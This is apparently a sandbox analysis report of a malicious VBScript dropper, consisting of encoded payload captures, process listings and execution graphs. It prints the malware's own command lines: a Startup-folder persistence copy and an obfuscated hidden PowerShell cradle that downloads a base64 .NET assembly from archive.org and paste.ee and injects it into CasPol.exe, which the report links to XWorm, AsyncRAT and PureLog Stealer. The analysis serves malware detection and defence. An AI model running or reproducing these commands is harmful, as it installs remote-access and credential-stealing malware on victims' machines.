                                            Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                            Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                            Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                            Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                            2024-09-25 13:26:23 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                            Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                            2024-09-25 13:26:23 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                            Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                            2024-09-25 13:26:23 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                            Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49708 | 188.114.96.3 | 443 | 7348 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:26:33 UTC | 67 | OUT | GET /d/Sk1Jg/0 HTTP/1.1
                                            Host: paste.ee
                                            Connection: Keep-Alive
2024-09-25 13:26:33 UTC | 1224 | IN | HTTP/1.1 200 OK
                                            Date: Wed, 25 Sep 2024 13:26:33 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=2592000
                                            strict-transport-security: max-age=63072000
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1; mode=block
                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXiB4z%2BypUKX9ydPrGBrQQYICDVpau01%2B6Ci9RBJWlsVtWvtwz%2F%2FHGGd5gU121j%2Bn%2Bq1vuKXWknntFWL%2Ft%2FOq%2BtS3uWkiFyczI%2FHJ%2FcL%2BohI9AQbhicDRQMI%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8c8b58b8ed9142e2-EWR
                                            2024-09-25 13:26:33 UTC145INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-09-25 13:26:33 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            2024-09-25 13:26:33 UTC1369INData Raw: 68 35 47 49 69 41 6a 4c 77 34 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 41 41 41 41 41 4d 41 34 43 41 77 41 67 4c 41 41 44
                                            Data Ascii: h5GIiAjLw4CMuEjI942bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAAAAAAAMA4CAwAgLAAD


                                            Target ID:0
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
                                            Imagebase:0x7ff6bba20000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                                            Imagebase:0x7ff782ad0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:09:26:02
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\PING.EXE
                                            Wow64 process (32bit):false
                                            Commandline:ping 127.0.0.1 -n 10
                                            Imagebase:0x7ff6b7290000
                                            File size:22'528 bytes
                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:5
                                            Start time:09:26:12
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:09:26:18
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:09:26:18
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:9
                                            Start time:09:26:19
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:09:26:33
                                            Start date:25/09/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                            Imagebase:0xcc0000
                                            File size:108'664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:13.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:52
                                              Total number of Limit Nodes:6
                                              execution_graph 11941 16118e0 11942 16118e4 11941->11942 11945 1611ce0 11942->11945 11950 1611bc9 11942->11950 11946 1611cb7 11945->11946 11947 1611cde 11946->11947 11955 1612168 11946->11955 11960 1612178 11946->11960 11947->11942 11952 1611bd0 11950->11952 11951 1611cde 11951->11942 11952->11951 11953 1612168 3 API calls 11952->11953 11954 1612178 3 API calls 11952->11954 11953->11952 11954->11952 11956 1612178 11955->11956 11965 1612bc8 11956->11965 11970 1612d6b 11956->11970 11957 161227e 11957->11957 11961 161219d 11960->11961 11963 1612bc8 3 API calls 11961->11963 11964 1612d6b 3 API calls 11961->11964 11962 161227e 11962->11962 11963->11962 11964->11962 11966 1612bcd 11965->11966 11967 1612d5e 11966->11967 11975 16179e0 11966->11975 11979 16179f0 11966->11979 11967->11957 11971 1612d6e 11970->11971 11972 1613062 11971->11972 11973 16179e0 3 API calls 11971->11973 11974 16179f0 3 API calls 11971->11974 11972->11957 11973->11972 11974->11972 11976 1617a15 11975->11976 11983 1617c80 11976->11983 11977 1617a77 11977->11967 11980 1617a15 11979->11980 11982 1617c80 3 API calls 11980->11982 11981 1617a77 11981->11967 11982->11981 11987 16180c8 11983->11987 11995 16180ba 11983->11995 11984 1617c9e 11984->11977 11988 16180d5 11987->11988 11989 16180fd 11987->11989 11988->11984 12003 1617cb8 11989->12003 11991 161811e 11991->11984 11993 16181e6 GlobalMemoryStatusEx 11994 1618216 11993->11994 11994->11984 11996 16180d5 11995->11996 11997 16180fd 11995->11997 11996->11984 11998 1617cb8 GlobalMemoryStatusEx 11997->11998 12000 161811a 11998->12000 11999 161811e 11999->11984 12000->11999 12001 16181e6 GlobalMemoryStatusEx 12000->12001 12002 1618216 12001->12002 12002->11984 12004 16181a0 GlobalMemoryStatusEx 12003->12004 12006 161811a 12004->12006 12006->11991 12006->11993

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4cfdd6cdb36cf046272d2ec05271fdcbcaba02e21c9f9d5824a5d21cb147590
                                              • Instruction ID: db3e6a842058390aaa7b5fd13c2602d1ee1784887bb4bc170548d77cbbf8d284
                                              • Opcode Fuzzy Hash: d4cfdd6cdb36cf046272d2ec05271fdcbcaba02e21c9f9d5824a5d21cb147590
                                              • Instruction Fuzzy Hash: 13412332D047568FDB15DFB9D8407DABBF5EF8A210F18856AD404A7341EB789845CBE0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 25 1617cb8-1618214 GlobalMemoryStatusEx 29 1618216-161821c 25->29 30 161821d-1618245 25->30 29->30
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0161811A), ref: 01618207
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 2e126b53d7c065bfd2c72afe485777a38a972780311a1204eb13d724c9ea6863
                                              • Instruction ID: cbad4f7c651d3c07700f81320d849239821cee544dac8f700fc5e0c8dd0b0af7
                                              • Opcode Fuzzy Hash: 2e126b53d7c065bfd2c72afe485777a38a972780311a1204eb13d724c9ea6863
                                              • Instruction Fuzzy Hash: B41103B2C0065A9FDB10DF9AC844BDEFBF4EF48210F14816AE818A7240D378A954CFE5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 33 1618198-161819c 34 16181a9-16181de 33->34 35 161819e-16181a6 33->35 36 16181e6-1618214 GlobalMemoryStatusEx 34->36 35->34 37 1618216-161821c 36->37 38 161821d-1618245 36->38 37->38
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0161811A), ref: 01618207
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 10450ad4ed74bc0e8e7caa8fe10891445a126fddd6bde9c0cb66a69285c3660a
                                              • Instruction ID: 8d95ebb4d901ce2f2167696c71a11b837e5d8218f2aa8d680a93b6156208ece9
                                              • Opcode Fuzzy Hash: 10450ad4ed74bc0e8e7caa8fe10891445a126fddd6bde9c0cb66a69285c3660a
                                              • Instruction Fuzzy Hash: 8A1112B6C0065ACFDB10CF9AD9447DEFBB4AF48210F29816AD418A7340D378A945CFE1